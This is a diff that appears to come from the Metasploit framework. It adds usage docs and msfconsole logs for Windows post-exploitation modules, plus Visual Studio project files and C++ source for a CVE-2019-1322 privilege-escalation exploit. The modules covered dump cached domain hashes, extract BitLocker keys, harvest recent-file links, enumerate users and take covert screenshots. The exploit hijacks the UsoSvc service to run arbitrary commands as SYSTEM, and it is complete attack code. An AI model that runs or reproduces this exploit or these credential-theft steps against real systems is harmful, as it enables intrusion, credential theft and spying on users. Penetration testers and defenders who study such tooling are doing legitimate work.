+  msf post(windows/gather/bitlocker_fvek) > run
+
+    [+] Successfuly opened Disk 0
+    [*] Trying to gather a recovery key
+    [+] Recovery key found : 579744-627517-149402-208362-055022-542289-041470-364089
+    [*] The recovery key derivation usually take 20 seconds...
+    [+] Successfully extract FVEK in /root/.msf4/loot/20191211125311_default_192.168.1.6_windows.file_437952.bin
+    [+] This hard drive could later be decrypted using : dislocker -k <key_file> ...
+    [*] Post Successful
+    [*] Post module execution completed
+  msf post(windows/gather/bitlocker_fvek) > sessions 1
+    [*] Starting interaction with 1...
+
+  meterpreter > sysinfo
+    Computer        : TEST-PC
+    OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : DOMAIN
+    Logged On Users : 1
+    Meterpreter     : x86/windows
+  meterpreter > getuid
+    Server username: NT AUTHORITY\SYSTEM
+  ```
@@ -0,0 +1,45 @@
+## Vulnerable Application
+
+This module uses the registry to extract the stored domain hashes that have been cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.
+
+## Verification Steps
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/cachedump```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+  **SESSION**
+
+  The session to run this module on.
+
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.6:49184) at 2019-12-11 12:51:59 -0700
+
+  msf > use post/windows/gather/cachedump
+  msf post(windows/gather/cachedump) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/cachedump) > run
+
+    [*] Executing module against TEST-PC
+    [*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
+    [*] Obtaining boot key...
+    [*] Obtaining Lsa key...
+    [*] Vista or above system
+    [*] Obtaining NL$KM...
+    [*] Dumping cached credentials...
+    [*] Hash are in MSCACHE_VISTA format. (mscash2)
+    [+] MSCACHE v2 saved in: /root/.msf4/loot/20191211134214_default_192.168.1.6_mscache2.creds_626325.txt
+    [*] John the Ripper format:
+    # mscash2
+    administrator:$DCC2$10240#administrator#89f253291a4b53a41c94057d644cbd1d::
+
+    [*] Post module execution completed
+  ```
@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+This module displays the records stored in the DNS cache.
+
+## Verification Steps
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/dnscache_dump```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+  **SESSION**
+
+  The session to run this module on.
+
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.6:49184) at 2019-12-11 12:51:59 -0700
+
+  msf > use post/windows/gather/dnscache_dump
+  msf post(windows/gather/dnscache_dump) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/dnscache_dump) > run
+
+    [*] DNS Cached Entries
+    ==================
+
+    TYPE  DOMAIN
+    ----  ------
+    0001  dc.domain.local
+    0001  watson.microsoft.com
+    0005  download.windowsupdate.com
+    0005  go.microsoft.com
+    0005  www.msftncsi.com
+    0005  download.microsoft.com
+    00ff  isatap
+    00ff  wpad
+    00ff  _ldap._tcp.dc.domain.local
+    00ff  _ldap._tcp.default-first-site-name._sites.dc.domain.local
+
+    [*] Post module execution completed
+    ```
@@ -0,0 +1,79 @@
+
+## Vulnerable Application
+
+  The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script. This module will parse .lnk files from a user's
+  Recent Documents folder and Microsoft Office's Recent Documents folder, if present. Windows creates these link files automatically
+  for many common file types. The .lnk files contain time stamps, file locations, including share names, volume serial numbers, and more.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/dumplinks```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+  **SESSION**
+
+  The session to run the module on.
+
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49160) at 2019-12-11 15:45:16 -0700
+
+  msf > use post/windows/gather/dumplinks
+  msf post(windows/gather/dumplinks) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/dumplinks) > run
+
+    [*] Running module against TEST-PC
+    [*] Extracting lnk files for user TEST at C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\...
+    [*] Processing: C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\myPasswords.lnk.
+    [*] Processing: C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\Network and Internet.lnk.
+    [*] No Recent Office files found for user TEST. Nothing to do.
+    [*] Post module execution completed
+  ```
+
+## Example of looted .lnk output
+
+  ```
+  [*] exec: cat /root/.msf4/loot/20191211154832_default_192.168.1.10_host.windows.lnk_124491.txt
+
+  C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\myPasswords.lnk:
+          Access Time       = 2019-12-11 23:44:39 -0700
+          Creation Date     = 2019-12-11 23:44:39 -0700
+          Modification Time = 2019-12-11 23:44:39 -0700
+  Contents of C:\Users\TEST\AppData\Roaming\Microsoft\Windows\Recent\myPasswords.lnk:
+          Flags:
+                  Shell Item ID List exists.
+                  Shortcut points to a file or directory.
+                  The shortcut has a relative path string.
+                  The shortcut has working directory.
+          Attributes:
+                  Target was modified since last backup.
+          Target file's MAC Times stored in lnk file:
+                  Creation Time     = 2019-12-11 23:44:30 -0700. (UTC)
+                  Modification Time = 2019-12-11 23:44:30 -0700. (UTC)
+                  Access Time       = 2019-12-11 23:44:30 -0700. (UTC)
+          ShowWnd value(s):
+                  SW_NORMAL.
+                  SW_SHOWMAXIMIZED.
+                  SW_SHOW.
+                  SW_SHOWMINNOACTIVE.
+                  SW_RESTORE.
+        Target file's MAC Times stored in lnk file:
+                  Creation Time     = 2019-12-11 23:44:30 -0700. (UTC)
+                  Modification Time = 2019-12-11 23:44:30 -0700. (UTC)
+                  Access Time       = 2019-12-11 23:44:30 -0700. (UTC)
+        Shortcut file is on a local volume.
+                  Volume Name =
+                  Volume Type = Fixed
+                  Volume SN   = 0x548EF20B
+        Target path = C:\Users\TEST\Desktop\myPasswords.txt&..\..\..\..\..\Desktop\myPasswords.txtC:\Users\TEST\Desktop(
+      ```
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+This module will enumerate all installed applications on a Windows system.
+
+## Verification Steps
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/enum_applications```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+  **SESSION**
+
+  The session to run this module on.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-10 14:18:44 -0700
+
+  msf exploit(windows/smb/group_policy_startup) > use post/windows/gather/enum_applications
+  msf post(windows/gather/enum_applications) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/enum_applications) > run
+
+    [*] Enumerating applications installed on PC
+
+    Installed Applications
+    ======================
+
+      Name                Version
+      ----                -------
+      PuTTY release 0.73  0.73.0.0
+
+
+    [+] Results stored in: /root/.msf4/loot/20191211092812_default_192.168.1.4_host.application_951840.txt
+    [*] Post module execution completed
+    ```
@@ -0,0 +1,60 @@
+
+## Vulnerable Application
+
+  Enumerate PCI hardware information from the registry. Please note this script will run through registry subkeys such as: 'PCI', 'ACPI',
+  'ACPI_HAL', 'FDC', 'HID', 'HTREE', 'IDE', 'ISAPNP', 'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW', and 'USB'; it will take time to
+  finish. It is recommended to run this module as a background job.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/enum_devices```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+  **SESSION**
+
+  The session to run the module on.
+
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49160) at 2019-12-11 15:45:16 -0700
+
+  msf > use post/windows/gather/enum_devices
+  msf post(windows/gather/enum_devices) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/enum_devices) > run
+
+    [*] Enumerating hardware on TEST-PC
+    [+] Results saved in: /root/.msf4/loot/20191211161351_default_192.168.1.10_host.hardware_245183.txt
+    [*] Post module execution completed
+  ```
+
+## Example of looted output
+
+  ```
+    [*] exec: cat /root/.msf4/loot/20191211161351_default_192.168.1.10_host.hardware_245183.txt
+
+    Device Information
+    ==================
+
+    Device Description                                     Driver Version   Class         Manufacturer                          Extra
+    ------------------                                     --------------   -----         ------------                          -----
+    ACPI Fixed Feature Button                              6.1.7601.17514   System        (Standard system devices)
+    ACPI x86-based PC                                      6.1.7600.16385   Computer      (Standard computers)
+    AMD K8 Processor                                       6.1.7600.16385   Processor     Advanced Micro Devices                Common KVM processor
+    Beep                                                                    LegacyDriver
+    CD-ROM Drive                                           6.1.7601.17514   CDROM         (Standard CD-ROM drives)              QEMU QEMU DVD-ROM ATA Device
+    CD/DVD File System Reader                                               LegacyDriver
+    CNG                                                                     LegacyDriver
+    Composite Bus Enumerator                               6.1.7601.17514   System        Microsoft
+    Disk drive                                             6.1.7600.16385   DiskDrive     (Standard disk drives)                Red Hat VirtIO SCSI Disk Device
+    ...snip...
+  ```
@@ -0,0 +1,64 @@
+
+## Vulnerable Application
+
+This module will enumerate current and recently logged on Windows users.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/enum_logged_on_users```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+  **CURRENT**
+
+  Enumerate currently logged on users. Default: ```true```
+
+  **RECENT**
+
+  Enumerate Recently logged on users. Default: ```true```
+
+  **SESSION**
+
+  The session to run this module on.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49196) at 2019-12-13 04:36:54 -0700
+
+  msf exploit(multi/handler) > use post/windows/gather/enum_logged_on_users
+  msf post(windows/gather/enum_logged_on_users) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/enum_logged_on_users) > run
+
+  [*] Running against session 1
+
+    Current Logged Users
+    ====================
+
+    SID                                            User
+    ---                                            ----
+    S-1-5-21-3113421791-4205713440-112141152-1000  TEST-PC\TEST
+
+
+    [+] Results saved in: /root/.msf4/loot/20191213054456_default_192.168.1.10_host.users.activ_424278.txt
+
+    Recently Logged Users
+    =====================
+
+    SID                                            Profile Path
+    ---                                            ------------
+    S-1-5-18                                       %systemroot%\system32\config\systemprofile
+    S-1-5-19                                       C:\Windows\ServiceProfiles\LocalService
+    S-1-5-20                                       C:\Windows\ServiceProfiles\NetworkService
+    S-1-5-21-3113421791-4205713440-112141152-1000  C:\Users\TEST
+
+
+    [*] Post module execution completed
+  ```
@@ -0,0 +1,46 @@
+## Vulnerable Application
+
+This module will incrementally take desktop screenshots from the
+host. This allows for screen spying which can be useful to determine
+if there is an active user on a machine, or to record the screen for
+later data extraction.
+
+Note: As of March, 2014, the `VIEW_CMD` option
+has been removed in favor of the Boolean `VIEW_SCREENSHOTS` option,
+which will control if (but not how) the collected screenshots will
+be viewed from the Metasploit interface.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/screen_spy```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+  **SESSION**
+
+  The session to run the module on.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
+
+
+  msf > use post/windows/gather/screen_spy
+  msf post(windows/gather/screen_spy) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/screen_spy) > run
+
+    [*] Migrating to explorer.exe pid: 1908
+    [+] Migration successful
+    [*] Capturing 6 screenshots with a delay of 5 seconds
+    [*] Screen Spying Complete
+    [*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
+    [*] Post module execution completed
+  ```
@@ -0,0 +1,50 @@
+## Vulnerable Application
+
+  This Module lists current TCP sessions.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get meterpreter session
+  3. Do: ```use post/windows/gather/tcpnetstat```
+  4. Do: ```set SESSION <session id>```
+  5. Do: ```run```
+
+## Options
+
+  **SESSION**
+
+  The session to run the module on.
+
+## Scenarios
+
+### Windows 7 (6.1 Build 7601, Service Pack 1).
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
+
+  msf > use post/windows/gather/tcpnetstat
+  msf post(windows/gather/tcpnetstat) > set SESSION 1
+    SESSION => 1
+  msf post(windows/gather/tcpnetstat) > run
+
+    [*] TCP Table Size: 412
+    [*] Total TCP Entries: 10
+    [*] Connection Table
+    ================
+
+    STATE        LHOST         LPORT  RHOST        RPORT
+    -----        -----         -----  -----        -----
+    ESTABLISHED  192.168.1.10  49184  192.168.1.3  4444
+    LISTEN       0.0.0.0       135    0.0.0.0      _
+    LISTEN       0.0.0.0       445    0.0.0.0      _
+    LISTEN       0.0.0.0       5357   0.0.0.0      _
+    LISTEN       0.0.0.0       49152  0.0.0.0      _
+    LISTEN       0.0.0.0       49153  0.0.0.0      _
+    LISTEN       0.0.0.0       49154  0.0.0.0      _
+    LISTEN       0.0.0.0       49155  0.0.0.0      _
+    LISTEN       0.0.0.0       49156  0.0.0.0      _
+    LISTEN       192.168.1.10  139    0.0.0.0      _
+
+    [*] Post module execution completed
+  ```
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2019-1322-EXE", "CVE-2019-1322-EXE.vcxproj", "{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.ActiveCfg = Debug|x64
+		{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.Build.0 = Debug|x64
+		{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.ActiveCfg = Release|x64
+		{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,150 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20191322EXE</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>..\..\..\..\..\data\exploits\cve-2019-1322</OutDir>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2019-1322.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2019-1322.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
@@ -0,0 +1,67 @@
+#include <atlbase.h>    // CComPtr
+#include <Propvarutil.h>
+#include <string>
+#import "wshom.ocx" no_namespace, raw_interfaces_only  // Error here is a bug. It will still compile
+
+# define command_size 128
+
+int wmain(int argc, wchar_t* argv[], wchar_t* envp[])
+{
+	GUID guidObject = { 0x6d8ff8e7, 0x730d, 0x11d4, { 0xbf, 0x42, 0x00, 0xb0, 0xd0, 0x11, 0x8b, 0x56 } };
+	struct __declspec(uuid("6d8ff8d4-730d-11d4-bf42-00b0d0118b56"))
+	IUPnPContainerManager : public IUnknown {
+	virtual HRESULT __stdcall ReferenceContainer(wchar_t*) = 0;
+	virtual HRESULT __stdcall UnReferenceContainer(wchar_t*) = 0;
+	virtual HRESULT __stdcall CreateInstance(
+		wchar_t* string1,
+		GUID* guid1,
+		GUID* guid2,
+		IUnknown** pObject) = 0;
+	virtual HRESULT __stdcall CreateInstanceWithProgID(
+		wchar_t* string1,
+		wchar_t* guid1,
+		GUID* guid2,
+		IUnknown** pObject) = 0;
+	virtual HRESULT __stdcall Shutdown() = 0;
+
+	};
+	wchar_t command[command_size];
+
+	CoInitialize(NULL);
+	HRESULT hr1, hr2 = 0, hr3 = 0, hr4 = 0;
+	IUPnPContainerManager* ContainerMgr;
+	hr1 = CoCreateInstance(guidObject, nullptr, CLSCTX_ALL, IID_PPV_ARGS(&ContainerMgr));
+	hr2 = ContainerMgr->ReferenceContainer((wchar_t*)L"fUUUtb");
+	CLSID clsid;
+	CLSIDFromProgID(OLESTR("WScript.Shell"), &clsid);
+	IWshShell* WshInterface = nullptr;
+	auto ShellUUID = __uuidof(IWshShell);
+	hr3 = ContainerMgr->CreateInstance((wchar_t*)L"fUUUtb", &clsid, &ShellUUID, (IUnknown**)&WshInterface);
+
+	int out;
+	VARIANT s;
+	InitVariantFromInt32(1, &s);
+	VARIANT type;
+	InitVariantFromBoolean(TRUE, &type);
+
+	if (argc == 2)
+	{
+		const wchar_t* msg[6] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c ", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
+		memset((void*) command, 0, command_size * sizeof(wchar_t));
+		wsprintf(command, L"%s%s &\"", msg[1], argv[1]);
+		for (int i = 0; i < 6; i++)
+		{
+			if (i == 1)
+			{
+				hr4 = WshInterface->Run(::SysAllocString(command), &s, &type, &out);
+			}
+			else
+			{
+				hr4 = WshInterface->Run(::SysAllocString(msg[i]), &s, &type, &out);
+			}
+			Sleep(3000);
+		}
+	}
+	CoUninitialize();
+	return 0;
+}
@@ -0,0 +1,84 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20191322EXE</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
